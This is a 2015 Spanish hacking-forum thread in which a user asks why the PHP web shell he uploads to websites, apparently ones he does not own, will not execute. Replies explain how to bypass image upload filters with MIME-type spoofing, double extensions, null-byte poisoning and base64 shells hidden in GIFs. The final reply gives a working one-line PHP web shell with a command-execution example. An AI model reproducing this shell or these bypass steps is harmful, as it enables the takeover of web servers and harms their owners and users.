Sólo texto | Texto con Imágenes

Underc0de - La Casa de los Informáticos

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: ricky19_77 en Mayo 16, 2015, 01:09:20 AM

Título: Problema para subir shell
Publicado por: ricky19_77 en Mayo 16, 2015, 01:09:20 AM
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo
Título: Re:problema para subir shell
Publicado por: S t Ø r M d ∆ r k en Mayo 16, 2015, 02:00:58 AM
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg. Si no se puede intenta bypassear el uploader de otra manera, juega con las extensiones asi file.jpeg.php o file.php.jpeg para q veas como funciona el uploader, puedes intentar tambien un null byte poissoning..

saludos.
Título: Re:problema para subir shell
Publicado por: blackdrake en Mayo 16, 2015, 08:55:54 AM
Haz como dijo storm, si no, recuerda que no todos los uploaders se pueden bypassear.

Saludos.
Título: Re:Problema para subir shell
Publicado por: ricky19_77 en Mayo 16, 2015, 03:16:59 PM
en realidad no lo probe en un solo uploader por eso decia si estoy haciendo algo mal tambien meti la shell dentro del codigo fuente de un gif y tampoco me dejo es que veo muchos tutoriales y lo unico que hacen es subir la shell y despues le cambian la extension y listo se ejecuta
Título: Re:Problema para subir shell
Publicado por: EPSILON en Mayo 16, 2015, 06:02:34 PM
Proba con un gif que no pese mucho, ami me paso de no poder subir por la imagen y cuando la cambie me dejo, agregale el ; al final y metele la shell en base64 con el
Código (php) [Seleccionar]
<? base64_decode(); ?> obvio , y cuando lo subas editale la cabecera y donde dice Content-Type: le pones image/gif (Recuerda que no todos los uploads son vulnerables!)). Saludos!
Título: Re:problema para subir shell
Publicado por: seth en Mayo 17, 2015, 09:43:14 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tienes que cambiarle el mime-type, aparte es alreves, subes la shell en php y despues cambias la cabecera mime type a image/jpeg.
es lo mismo
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
hola gente tengo el siguiente problema subo una shell a servidor web con extension jpeg le cambio la extension con live http headers , busco la ruta de la imagen la pongo en el navegador y me tira error osea no me carga la shell creo que algo estoy haciendo mal porque la probe en otra web y me dice lo mismo

no todos los uploaders te dejan subir shell
proba con uno que sepas que es vulnerable, lo mas facil es hacerlo en localhost. podes usar este http://n3t-datagrams.net/docs/?/=15
no se que shell estas usando pero capaz no pasa porque es muy pesada. podes usar <?PHP $_GET['a']($_GET['b']);?> y para ejecutar comandos haces ?a=passthru&b=ls
que error te da?
Sólo texto | Texto con Imágenes